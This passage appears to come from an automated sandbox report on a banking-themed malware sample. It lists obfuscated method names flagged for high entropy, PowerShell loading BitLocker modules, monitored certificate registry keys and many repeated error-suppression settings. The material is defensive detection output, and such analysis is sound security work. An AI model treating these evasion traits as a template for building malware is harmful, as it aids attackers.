Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, IXAZZOBxjBEyp8hsZs.cs	High entropy of concatenated method names: 'Dispose', 'TbcEk6fpog', 'GAQRXNUuq2', 'oIub3e1hm3', 'mVtE2oGCW4', 'gr3EzuSN6C', 'ProcessDialogKey', 'YjXRDnVHXZ', 'V05REQPOFV', 'zPcRRevPl8'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, ju7ZP0ID9VJZr4PMmj.cs	High entropy of concatenated method names: 'XD1urXd3jZ', 'dXwu2xPJku', 'bYZJDt7UJm', 'D4oJEV1dbo', 'lLduYZfx6k', 'WKZulQyxMX', 'ddYuw6QS0s', 'bKTuAsMR2B', 'lWEuVmC58m', 'sxUunF3iRp'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, uKJZ9dEErKTqKLwmqyJ.cs	High entropy of concatenated method names: 'JaS02FNQYO', 'muF0zCmmVC', 'cmdhDRrTI9', 'OBGhEaqhtB', 'VyEhR1jKU7', 'O8xhm4SnYd', 'Grshja3XtD', 'Y6xheHGF5b', 'uGyhTsDUX8', 'Jy0hBW7ErO'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, g6ox2O7M9PPBS2a34p.cs	High entropy of concatenated method names: 'PxxxSDJsFy', 'fIfxd4jIrM', 'R8JxUAZ4ZG', 'PGLxb4Ltqp', 'aTNx50BmfF', 'vcCxpDEKJp', 'yWlxQ3MT4V', 'gjfx4FVJYD', 'wIkxWVP3xa', 'CMrxFKckID'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, veqIyGz50RFl7Ca1mV.cs	High entropy of concatenated method names: 'OoS0pBJTLW', 'Duq04iddrX', 'bwa0WgObaA', 'qJJ0iLDYU9', 'ge10XTKxqX', 'bK70OqKHmt', 'Sfk0sU64vq', 'pPq0LdxdvI', 'P000S9CBxW', 'Fus0dE01XP'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, PhEnfrnNqESTaLmMtn.cs	High entropy of concatenated method names: 'ToString', 'LYTyYFKvRO', 'n7tyX4Ci1H', 'XYiyc9vsRe', 'cWVyOMGrv1', 'tLWysAdJlB', 'LXFyN63Xox', 'b6YyPjhVyv', 'YKDy8dVYGO', 'EGky7dM2Yx'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, HnVHXZkI05QPOFVUPc.cs	High entropy of concatenated method names: 'IecgiiUhPi', 'j20gX6m5s4', 'Qk6gcce8G1', 'nwlgO0isJj', 'skbgsCC2qN', 'FtCgNaYqsc', 'UdHgPR7j1u', 'lDHg8qMUnY', 'oE6g7CBe19', 'fOTgoRS3bm'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, gEM2EEW1CxFeO5Qa7B.cs	High entropy of concatenated method names: 'Wv7Hb9S685', 'KHFHp4x9vQ', 'gB3H4UeeXb', 'rC4HWwriyw', 'W8eHa4EX99', 'vxWHyM1WqB', 'BUjHuXelq5', 'mnDHJHJILa', 'n6OHgyeMFC', 'W0KH03Mw98'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, e5PLwVEDrjc1DXkT6Ee.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DCC0Y4BNDL', 'dYJ0lUTmBe', 'E7V0wtt0TY', 'tuu0AK4bPy', 'k5c0VLi0YV', 'XIZ0nrXB7g', 'M9c06APe6G'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, OR4PrZR3vKDptJU2LL.cs	High entropy of concatenated method names: 'ebSUDN5bA', 'FcubvOxv6', 'Inap2B5eP', 'duFQHG9nZ', 'SH2Wi0QDT', 'GJxFr01RI', 'QDKXAWICCVXcTLReNn', 'N5c7W9K9n7UWqgBSod', 'yLwJ1gARZ', 'MGR0ywZIy'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, lZB8mFEjIPgEnB952He.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Q2JGgQdFCy', 'ueTG0uGcgr', 'UWxGhxEhiQ', 'sgbGGQdwuY', 'Jn1G9NUUNE', 'aF8G1Ks0Vc', 'PHNGLTiXIF'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.7630000.5.raw.unpack, cJEy3lj7RDhmtksKR3.cs	High entropy of concatenated method names: 'QepEx3Dgu6', 'QpSEtQ0gQI', 'b1CEKxFeO5', 'Da7EfBVPFp', 'XM3EaAwRTX', 'N4LEyeQS7l', 'sPDsqlYC3Gc0KAKIrc', 'T1Cd9AiNKs1ETNBNJ8', 'FBYEERmniq', 'sJ5EmTFG7i'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, q8qlp0MKt6bc6fpogf.cs	High entropy of concatenated method names: 'oJ3gaFH9BQ', 'iHcguTXgBD', 'an1gg3NXcY', 'N4DghjFwcK', 'c95g9m8LgK', 'CrJgL0mdea', 'Dispose', 'k4GJT2r9PB', 'kZwJBUuIoo', 'gl9JHQXnOv'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, WYNTdRwdLMl5qTPEQ1.cs	High entropy of concatenated method names: 'Cwkq4ceZtE', 'DPkqWj5PNI', 'XWGqi7gMwk', 'PuWqXNSZ2U', 'v6eqOWsr69', 'D15qsjuRDV', 'WBxqPYryjL', 'Q7sq8m31Zx', 'KTCqo6wevs', 'b3lqYR8tPu'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, cTXo4LieQS7llBmlju.cs	High entropy of concatenated method names: 'VuLZe0as2H', 'aFMZBAmpkV', 'fZJZCM15ha', 'GPuZxQ8m7L', 'b7TZtARkyh', 'TIUC3FnvJE', 'SZECIESDoB', 'vyRCMmuHLO', 'NfACrWtj1M', 'jxYCkcFHZg'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, oK1H8TtA0Gp2t4swCU.cs	High entropy of concatenated method names: 'tsWmeWVjPV', 'zFtmTRuGhy', 'rSPmBCJJ1f', 'sP8mHtoLBO', 'lltmCg4m1T', 'bPTmZWf7K5', 'xACmx8W1s3', 'DKMmtUFT6r', 'Qibmvm8WUY', 'hVGmKGPa3y'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, C3Dgu64wpSQ0gQIH6K.cs	High entropy of concatenated method names: 'l7dBAVxOJ1', 'YtnBVjgfyg', 'cC3BnGdbj6', 'uE5B6MKhss', 'OhEB3Rw60F', 'dnLBIj5yNe', 'AkWBMsp6I4', 'miVBreSW2x', 'ccjBk390gy', 'VMUB2b6Ink'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, j9cpiJ66Z9wiSMtdK0.cs	High entropy of concatenated method names: 'A1FuKNUuFR', 'xsKufkAB19', 'ToString', 'zMDuTSHwbw', 'FceuBgK86E', 'IE6uHPnKob', 'Xa2uCWPYF8', 'l1QuZH3KgV', 'KXBux9ZGam', 'sGEut2JHFK'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, V4kQeGERxknqoQkEuwR.cs	High entropy of concatenated method names: 'ToString', 'CB4h4fGGPm', 'qSAhWdqH4Y', 'WPihFUV0H7', 'os7hidYyv0', 'oqkhXXTyCy', 'PFjhcJWONj', 'VethOl6tJC', 'EVZ6KclBLPxOLu5JuMi', 'b73wW9lNas1DWFf11RR'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, IXAZZOBxjBEyp8hsZs.cs	High entropy of concatenated method names: 'Dispose', 'TbcEk6fpog', 'GAQRXNUuq2', 'oIub3e1hm3', 'mVtE2oGCW4', 'gr3EzuSN6C', 'ProcessDialogKey', 'YjXRDnVHXZ', 'V05REQPOFV', 'zPcRRevPl8'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, ju7ZP0ID9VJZr4PMmj.cs	High entropy of concatenated method names: 'XD1urXd3jZ', 'dXwu2xPJku', 'bYZJDt7UJm', 'D4oJEV1dbo', 'lLduYZfx6k', 'WKZulQyxMX', 'ddYuw6QS0s', 'bKTuAsMR2B', 'lWEuVmC58m', 'sxUunF3iRp'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, uKJZ9dEErKTqKLwmqyJ.cs	High entropy of concatenated method names: 'JaS02FNQYO', 'muF0zCmmVC', 'cmdhDRrTI9', 'OBGhEaqhtB', 'VyEhR1jKU7', 'O8xhm4SnYd', 'Grshja3XtD', 'Y6xheHGF5b', 'uGyhTsDUX8', 'Jy0hBW7ErO'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, g6ox2O7M9PPBS2a34p.cs	High entropy of concatenated method names: 'PxxxSDJsFy', 'fIfxd4jIrM', 'R8JxUAZ4ZG', 'PGLxb4Ltqp', 'aTNx50BmfF', 'vcCxpDEKJp', 'yWlxQ3MT4V', 'gjfx4FVJYD', 'wIkxWVP3xa', 'CMrxFKckID'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, veqIyGz50RFl7Ca1mV.cs	High entropy of concatenated method names: 'OoS0pBJTLW', 'Duq04iddrX', 'bwa0WgObaA', 'qJJ0iLDYU9', 'ge10XTKxqX', 'bK70OqKHmt', 'Sfk0sU64vq', 'pPq0LdxdvI', 'P000S9CBxW', 'Fus0dE01XP'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, PhEnfrnNqESTaLmMtn.cs	High entropy of concatenated method names: 'ToString', 'LYTyYFKvRO', 'n7tyX4Ci1H', 'XYiyc9vsRe', 'cWVyOMGrv1', 'tLWysAdJlB', 'LXFyN63Xox', 'b6YyPjhVyv', 'YKDy8dVYGO', 'EGky7dM2Yx'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, HnVHXZkI05QPOFVUPc.cs	High entropy of concatenated method names: 'IecgiiUhPi', 'j20gX6m5s4', 'Qk6gcce8G1', 'nwlgO0isJj', 'skbgsCC2qN', 'FtCgNaYqsc', 'UdHgPR7j1u', 'lDHg8qMUnY', 'oE6g7CBe19', 'fOTgoRS3bm'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, gEM2EEW1CxFeO5Qa7B.cs	High entropy of concatenated method names: 'Wv7Hb9S685', 'KHFHp4x9vQ', 'gB3H4UeeXb', 'rC4HWwriyw', 'W8eHa4EX99', 'vxWHyM1WqB', 'BUjHuXelq5', 'mnDHJHJILa', 'n6OHgyeMFC', 'W0KH03Mw98'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, e5PLwVEDrjc1DXkT6Ee.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DCC0Y4BNDL', 'dYJ0lUTmBe', 'E7V0wtt0TY', 'tuu0AK4bPy', 'k5c0VLi0YV', 'XIZ0nrXB7g', 'M9c06APe6G'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, OR4PrZR3vKDptJU2LL.cs	High entropy of concatenated method names: 'ebSUDN5bA', 'FcubvOxv6', 'Inap2B5eP', 'duFQHG9nZ', 'SH2Wi0QDT', 'GJxFr01RI', 'QDKXAWICCVXcTLReNn', 'N5c7W9K9n7UWqgBSod', 'yLwJ1gARZ', 'MGR0ywZIy'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, lZB8mFEjIPgEnB952He.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Q2JGgQdFCy', 'ueTG0uGcgr', 'UWxGhxEhiQ', 'sgbGGQdwuY', 'Jn1G9NUUNE', 'aF8G1Ks0Vc', 'PHNGLTiXIF'
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.3ae9a10.3.raw.unpack, cJEy3lj7RDhmtksKR3.cs	High entropy of concatenated method names: 'QepEx3Dgu6', 'QpSEtQ0gQI', 'b1CEKxFeO5', 'Da7EfBVPFp', 'XM3EaAwRTX', 'N4LEyeQS7l', 'sPDsqlYC3Gc0KAKIrc', 'T1Cd9AiNKs1ETNBNJ8', 'FBYEERmniq', 'sJ5EmTFG7i'

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1			Jump to behavior

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
